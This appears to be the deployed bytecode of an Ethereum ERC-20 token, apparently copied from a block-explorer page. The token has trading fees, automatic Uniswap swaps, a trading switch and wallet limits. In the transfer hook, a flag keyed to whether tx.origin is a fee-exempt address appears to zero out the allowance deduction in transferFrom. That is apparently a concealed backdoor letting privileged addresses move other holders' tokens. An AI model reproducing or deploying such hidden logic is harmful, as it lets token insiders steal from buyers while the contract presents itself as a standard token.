fffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611d4457600854811115611d3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d3690613a83565b60405180910390fd5b611dec565b601b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611deb57600a54611d9e83610d2b565b82611da99190613978565b1115611dea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611de1906139f5565b60405180910390fd5b5b5b5b5b5f611df830610d2b565b90505f60095482101590505f818015611e1d5750600b60019054906101000a900460ff165b8015611e365750600660149054906101000a900460ff16155b8015611e895750601c5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015611edc5750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015611f2f5750601a5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f72576001600660146101000a81548160ff021916908315150217905550611f57612896565b5f600660146101000a81548160ff0219169083151502179055505b5f600660149054906101000a900460ff16159050601a5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806120215750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561202a575f90505b5f5f9050811561229857601c5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561208b57505f601254115b1561214b576120b860646120aa60125489612a9190919063ffffffff16565b612b0890919063ffffffff16565b9050601254601454826120cb91906133bd565b6120d59190613ace565b60175f8282546120e59190613978565b92505081905550601254601354826120fd91906133bd565b6121079190613ace565b60165f8282546121179190613978565b925050819055506012546015548261212f91906133bd565b6121399190613ace565b836121449190613978565b925061225f565b601c5f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156121a257505f600e54115b1561225e576121cf60646121c1600e5489612a9190919063ffffffff16565b612b0890919063ffffffff16565b9050600e54601054826121e291906133bd565b6121ec9190613ace565b60175f8282546121fc9190613978565b92505081905550600e54600f548261221491906133bd565b61221e9190613ace565b60165f82825461222e9190613978565b92505081905550600e546011548261224691906133bd565b6122509190613ace565b8361225b9190613978565b92505b5b5f8111156122735761227288308361260d565b5b5f831115612289576122883061dead8561260d565b5b808661229591906133fe565b95505b6122a388888861260d565b50505050505b505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff160361231d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612314906136ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361238b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161238290613748565b60405180910390fd5b8260015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925856040516124659190613230565b60405180910390a3949350505050565b5f5f82846124839190613978565b9050838110156124c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124bf90613b48565b60405180910390fd5b8091505092915050565b6124fd307f00000000000000000000000000000000000000000000000000000000000000008461166a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f5f61dead426040518863ffffffff1660e01b815260040161256396959493929190613b9f565b60606040518083038185885af115801561257f573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906125a49190613bfe565b5050505050565b5f8383111582906125f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125e99190613060565b60405180910390fd5b505f838561260091906133fe565b9050809150509392505050565b612618838383612b51565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612686576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267d906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036126f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126eb90613864565b60405180910390fd5b61275d81604051806060016040528060268152602001613f63602691395f5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546125ab9092919063ffffffff16565b5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506127ec815f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461247590919063ffffffff16565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128899190613230565b60405180910390a3505050565b5f6128a030610d2b565b90505f6016546017546128b39190613978565b90505f5f8314806128c357505f82145b156128d057505050612a8f565b60146009546128df91906133bd565b8311156128f85760146009546128f591906133bd565b92505b5f6002836017548661290a91906133bd565b6129149190613ace565b61291e9190613ace565b90505f6129348286612cf590919063ffffffff16565b90505f47905061294382612d3e565b5f6129578247612cf590919063ffffffff16565b90505f6129818761297360165485612a9190919063ffffffff16565b612b0890919063ffffffff16565b90505f818361299091906133fe565b90505f6017819055505f6016819055505f861180156129ae57505f81115b156129fb576129bd86826124d2565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb56185826017546040516129f293929190613c4e565b60405180910390a15b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051612a4090613cb0565b5f6040518083038185875af1925050503d805f8114612a7a576040519150601f19603f3d011682016040523d82523d5f602084013e612a7f565b606091505b5050809750505050505050505050505b565b5f5f8303612aa1575f9050612b02565b5f8284612aae91906133bd565b9050828482612abd9190613ace565b14612afd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612af490613d34565b60405180910390fd5b809150505b92915050565b5f612b4983836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612f71565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612bbf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612bb6906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612c2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c2490613864565b60405180910390fd5b5f811015612c70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c6790613d9c565b60405180910390fd5b612cf08383601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16612cc9575f612ceb565b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5b612fd2565b505050565b5f612d3683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506125ab565b905092915050565b5f600267ffffffffffffffff811115612d5a57612d59613dba565b5b604051908082528060200260200182016040528015612d885781602001602082028036833780820191505090505b50905030815f81518110612d9f57612d9e613de7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612e42573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612e669190613e28565b81600181518110612e7a57612e79613de7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612edf307f00000000000000000000000000000000000000000000000000000000000000008461166a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612f40959493929190613f0a565b5f604051808303815f87803b158015612f57575f5ffd5b505af1158015612f69573d5f5f3e3d5ffd5b505050505050565b5f5f83118290612fb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612fae9190613060565b60405180910390fd5b505f8385612fc59190613ace565b9050809150509392505050565b5f8111612fe0576001612fe2565b5f5b60ff16600581905550505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61303282612ff0565b61303c8185612ffa565b935061304c81856020860161300a565b61305581613018565b840191505092915050565b5f6020820190508181035f8301526130788184613028565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6130ad82613084565b9050919050565b6130bd816130a3565b81146130c7575f5ffd5b50565b5f813590506130d8816130b4565b92915050565b5f819050919050565b6130f0816130de565b81146130fa575f5ffd5b50565b5f8135905061310b816130e7565b92915050565b5f5f6040838503121561312757613126613080565b5b5f613134858286016130ca565b9250506020613145858286016130fd565b9150509250929050565b5f8115159050919050565b6131638161314f565b82525050565b5f60208201905061317c5f83018461315a565b92915050565b5f6020828403121561319757613196613080565b5b5f6131a4848285016130ca565b91505092915050565b5f819050919050565b5f6131d06131cb6131c684613084565b6131ad565b613084565b9050919050565b5f6131e1826131b6565b9050919050565b5f6131f2826131d7565b9050919050565b613202816131e8565b82525050565b5f60208201905061321b5f8301846131f9565b92915050565b61322a816130de565b82525050565b5f6020820190506132435f830184613221565b92915050565b5f5f5f606084860312156132605761325f613080565b5b5f61326d868287016130ca565b935050602061327e868287016130ca565b925050604061328f868287016130fd565b9150509250925092565b5f60ff82169050919050565b6132ae81613299565b82525050565b5f6020820190506132c75f8301846132a5565b92915050565b6132d6816130a3565b82525050565b5f6020820190506132ef5f8301846132cd565b92915050565b5f5f6040838503121561330b5761330a613080565b5b5f613318858286016130ca565b9250506020613329858286016130ca565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061337757607f821691505b60208210810361338a57613389613333565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6133c7826130de565b91506133d2836130de565b92508282026133e0816130de565b915082820484148315176133f7576133f6613390565b5b5092915050565b5f613408826130de565b9150613413836130de565b925082820390508181111561342b5761342a613390565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613465602083612ffa565b915061347082613431565b602082019050919050565b5f6020820190508181035f83015261349281613459565b9050919050565b7f43616e2774207769746864726177206e617469766520746f6b656e73000000005f82015250565b5f6134cd601c83612ffa565b91506134d882613499565b602082019050919050565b5f6020820190508181035f8301526134fa816134c1565b9050919050565b5f8151905061350f816130e7565b92915050565b5f6020828403121561352a57613529613080565b5b5f61353784828501613501565b91505092915050565b5f6040820190506135535f8301856132cd565b6135606020830184613221565b9392505050565b6135708161314f565b811461357a575f5ffd5b50565b5f8151905061358b81613567565b92915050565b5f602082840312156135a6576135a5613080565b5b5f6135b38482850161357d565b91505092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613616602683612ffa565b9150613621826135bc565b604082019050919050565b5f6020820190508181035f8301526136438161360a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6136a4602483612ffa565b91506136af8261364a565b604082019050919050565b5f6020820190508181035f8301526136d181613698565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613732602283612ffa565b915061373d826136d8565b604082019050919050565b5f6020820190508181035f83015261375f81613726565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6137c0602583612ffa565b91506137cb82613766565b604082019050919050565b5f6020820190508181035f8301526137ed816137b4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61384e602383612ffa565b9150613859826137f4565b604082019050919050565b5f6020820190508181035f83015261387b81613842565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f6138b6601683612ffa565b91506138c182613882565b602082019050919050565b5f6020820190508181035f8301526138e3816138aa565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613944603583612ffa565b915061394f826138ea565b604082019050919050565b5f6020820190508181035f83015261397181613938565b9050919050565b5f613982826130de565b915061398d836130de565b92508282019050808211156139a5576139a4613390565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6139df601383612ffa565b91506139ea826139ab565b602082019050919050565b5f6020820190508181035f830152613a0c816139d3565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613a6d603683612ffa565b9150613a7882613a13565b604082019050919050565b5f6020820190508181035f830152613a9a81613a61565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613ad8826130de565b9150613ae3836130de565b925082613af357613af2613aa1565b5b828204905092915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f613b32601b83612ffa565b9150613b3d82613afe565b602082019050919050565b5f6020820190508181035f830152613b5f81613b26565b9050919050565b5f819050919050565b5f613b89613b84613b7f84613b66565b6131ad565b6130de565b9050919050565b613b9981613b6f565b82525050565b5f60c082019050613bb25f8301896132cd565b613bbf6020830188613221565b613bcc6040830187613b90565b613bd96060830186613b90565b613be660808301856132cd565b613bf360a0830184613221565b979650505050505050565b5f5f5f60608486031215613c1557613c14613080565b5b5f613c2286828701613501565b9350506020613c3386828701613501565b9250506040613c4486828701613501565b9150509250925092565b5f606082019050613c615f830186613221565b613c6e6020830185613221565b613c7b6040830184613221565b949350505050565b5f81905092915050565b50565b5f613c9b5f83613c83565b9150613ca682613c8d565b5f82019050919050565b5f613cba82613c90565b9150819050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f613d1e602183612ffa565b9150613d2982613cc4565b604082019050919050565b5f6020820190508181035f830152613d4b81613d12565b9050919050565b7f45524332303a20696e76616c6964207472616e7366657220616d6f756e7400005f82015250565b5f613d86601e83612ffa565b9150613d9182613d52565b602082019050919050565b5f6020820190508181035f830152613db381613d7a565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050613e22816130b4565b92915050565b5f60208284031215613e3d57613e3c613080565b5b5f613e4a84828501613e14565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613e85816130a3565b82525050565b5f613e968383613e7c565b60208301905092915050565b5f602082019050919050565b5f613eb882613e53565b613ec28185613e5d565b9350613ecd83613e6d565b805f5b83811015613efd578151613ee48882613e8b565b9750613eef83613ea2565b925050600181019050613ed0565b5085935050505092915050565b5f60a082019050613f1d5f830188613221565b613f2a6020830187613b90565b8181036040830152613f3c8186613eae565b9050613f4b60608301856132cd565b613f586080830184613221565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122030ddd50ef1601cd8bf8f37d19042bc0c4b9fe2f66ece831138285e359ddc603864736f6c634300081c0033

Deployed Bytecode

0x608060405260043610610233575f3560e01c8063715018a61161012d578063b62496f5116100aa578063d0a5ec3b1161006e578063d0a5ec3b1461085e578063dd62ed3e14610888578063e2f45605146108c4578063f2fde38b146108ee578063f8b45b05146109165761023a565b8063b62496f51461077a578063b823d167146107b6578063bbc0c742146107e0578063c2d1d2e81461080a578063c8c8ebe4146108345761023a565b80638a8c523c116100f15780638a8c523c146106985780638da5cb5b146106ae57806395d89b41146106d8578063a457c2d714610702578063a9059cbb1461073e5761023a565b8063715018a6146105c85780637341cdbd146105de57806375f0a8741461060857806380eb913a146106325780638366e79a1461065c5761023a565b806339509351116101bb57806365f099f41161017f57806365f099f4146104e45780636795dade1461050e5780636bb0bf81146105385780636ddd17131461056257806370a082311461058c5761023a565b806339509351146103ee57806349bd5a5e1461042a5780634fbee193146104545780636010c1b5146104905780636095588d146104ba5761023a565b806318160ddd1161020257806318160ddd1461030a5780631a8145bb146103345780631f3fed8f1461035e57806323b872dd14610388578063313ce567146103c45761023a565b806306fdde031461023e578063095ea7b31461026857806310d5de53146102a45780631694505e146102e05761023a565b3661023a57005b5f5ffd5b348015610249575f5ffd5b50610252610940565b60405161025f9190613060565b60405180910390f35b348015610273575f5ffd5b5061028e60048036038101906102899190613111565b6109d0565b60405161029b9190613169565b60405180910390f35b3480156102af575f5ffd5b506102ca60048036038101906102c59190613182565b6109ed565b6040516102d79190613169565b60405180910390f35b3480156102eb575f5ffd5b506102f4610a0a565b6040516103019190613208565b60405180910390f35b348015610315575f5ffd5b5061031e610a2e565b60405161032b9190613230565b60405180910390f35b34801561033f575f5ffd5b50610348610a37565b6040516103559190613230565b60405180910390f35b348015610369575f5ffd5b50610372610a3d565b60405161037f9190613230565b60405180910390f35b348015610393575f5ffd5b506103ae60048036038101906103a99190613249565b610a43565b6040516103bb9190613169565b60405180910390f35b3480156103cf575f5ffd5b506103d8610bce565b6040516103e591906132b4565b60405180910390f35b3480156103f9575f5ffd5b50610414600480360381019061040f9190613111565b610bd6565b6040516104219190613169565b60405180910390f35b348015610435575f5ffd5b5061043e610c84565b60405161044b91906132dc565b60405180910390f35b34801561045f575f5ffd5b5061047a60048036038101906104759190613182565b610ca8565b6040516104879190613169565b60405180910390f35b34801561049b575f5ffd5b506104a4610cfa565b6040516104b19190613230565b60405180910390f35b3480156104c5575f5ffd5b506104ce610d00565b6040516104db9190613230565b60405180910390f35b3480156104ef575f5ffd5b506104f8610d06565b6040516105059190613230565b60405180910390f35b348015610519575f5ffd5b50610522610d0c565b60405161052f9190613230565b60405180910390f35b348015610543575f5ffd5b5061054c610d12565b6040516105599190613230565b60405180910390f35b34801561056d575f5ffd5b50610576610d18565b6040516105839190613169565b60405180910390f35b348015610597575f5ffd5b506105b260048036038101906105ad9190613182565b610d2b565b6040516105bf9190613230565b60405180910390f35b3480156105d3575f5ffd5b506105dc610d70565b005b3480156105e9575f5ffd5b506105f2610ec3565b6040516105ff9190613230565b60405180910390f35b348015610613575f5ffd5b5061061c610ec9565b60405161062991906132dc565b60405180910390f35b34801561063d575f5ffd5b50610646610eee565b6040516106539190613230565b60405180910390f35b348015610667575f5ffd5b50610682600480360381019061067d91906132f5565b610ef4565b60405161068f9190613169565b60405180910390f35b3480156106a3575f5ffd5b506106ac611131565b005b3480156106b9575f5ffd5b506106c2611210565b6040516106cf91906132dc565b60405180910390f35b3480156106e3575f5ffd5b506106ec611238565b6040516106f99190613060565b60405180910390f35b34801561070d575f5ffd5b5061072860048036038101906107239190613111565b6112c8565b6040516107359190613169565b60405180910390f35b348015610749575f5ffd5b50610764600480360381019061075f9190613111565b611390565b6040516107719190613169565b60405180910390f35b348015610785575f5ffd5b506107a0600480360381019061079b9190613182565b6113ad565b6040516107ad9190613169565b60405180910390f35b3480156107c1575f5ffd5b506107ca6113ca565b6040516107d79190613230565b60405180910390f35b3480156107eb575f5ffd5b506107f46113d0565b6040516108019190613169565b60405180910390f35b348015610815575f5ffd5b5061081e6113e2565b60405161082b9190613230565b60405180910390f35b34801561083f575f5ffd5b506108486113e8565b6040516108559190613230565b60405180910390f35b348015610869575f5ffd5b506108726113ee565b60405161087f91906132dc565b60405180910390f35b348015610893575f5ffd5b506108ae60048036038101906108a991906132f5565b611413565b6040516108bb9190613230565b60405180910390f35b3480156108cf575f5ffd5b506108d8611495565b6040516108e59190613230565b60405180910390f35b3480156108f9575f5ffd5b50610914600480360381019061090f9190613182565b61149b565b005b348015610921575f5ffd5b5061092a61165d565b6040516109379190613230565b60405180910390f35b60606003805461094f90613360565b80601f016020809104026020016040519081016040528092919081815260200182805461097b90613360565b80156109c65780601f1061099d576101008083540402835291602001916109c6565b820191905f5260205f20905b8154815290600101906020018083116109a957829003601f168201915b5050505050905090565b5f6109e36109dc611663565b848461166a565b6001905092915050565b601b602052805f5260405f205f915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b5f600254905090565b60175481565b60165481565b5f610a4f84848461182d565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610a96611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410158015610b0a57508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610bbc5750610bbb84610b1d611663565b60055485610b2b91906133bd565b60015f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b71611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610bb591906133fe565b876122ae565b5b80610bc5575060015b90509392505050565b5f6009905090565b5f610c7a610be2611663565b84610c758560015f610bf2611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461247590919063ffffffff16565b61166a565b6001905092915050565b7f0000000000000000000000000813e4c0ec920a5bae514e6596c572846fc1608681565b5f601a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b60105481565b600c5481565b60135481565b60145481565b600e5481565b600b60019054906101000a900460ff1681565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610d78611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfd9061347b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60115481565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b5f610efd611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061347b565b60405180910390fd5b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ff9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff0906134e3565b60405180910390fd5b5f8373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161103391906132dc565b602060405180830381865afa15801561104e573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110729190613515565b90508373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb84836040518363ffffffff1660e01b81526004016110af929190613540565b6020604051808303815f875af11580156110cb573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110ef9190613591565b91507fdeda980967fcead7b61e78ac46a4da14274af29e894d4d61e8b81ec38ab3e4388482604051611122929190613540565b60405180910390a15092915050565b611139611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146111c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111be9061347b565b60405180910390fd5b6111d96111d330610d2b565b476124d2565b6001600b5f6101000a81548160ff0219169083151502179055506001600b60016101000a81548160ff021916908315150217905550565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461124790613360565b80601f016020809104026020016040519081016040528092919081815260200182805461127390613360565b80156112be5780601f10611295576101008083540402835291602001916112be565b820191905f5260205f20905b8154815290600101906020018083116112a157829003601f168201915b5050505050905090565b5f6113866112d4611663565b8461138185604051806060016040528060258152602001613f896025913960015f6112fd611663565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546125ab9092919063ffffffff16565b61166a565b6001905092915050565b5f6113a361139c611663565b848461182d565b6001905092915050565b601c602052805f5260405f205f915054906101000a900460ff1681565b600f5481565b600b5f9054906101000a900460ff1681565b60125481565b60085481565b600d5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b6114a3611663565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611531576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115289061347b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361159f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115969061362c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116cf906136ba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161173d90613748565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516118209190613230565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361189b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611892906137d6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613864565b60405180910390fd5b5f81036119205761191b83835f61260d565b6122a9565b611928611210565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156119965750611966611210565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156119ce57505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611a08575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611a215750600660149054906101000a900460ff16155b15611dee57600b5f9054906101000a900460ff16611b1457601a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611ad45750601a5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611b13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0a906138cc565b60405180910390fd5b5b601c5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611bb15750601b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffff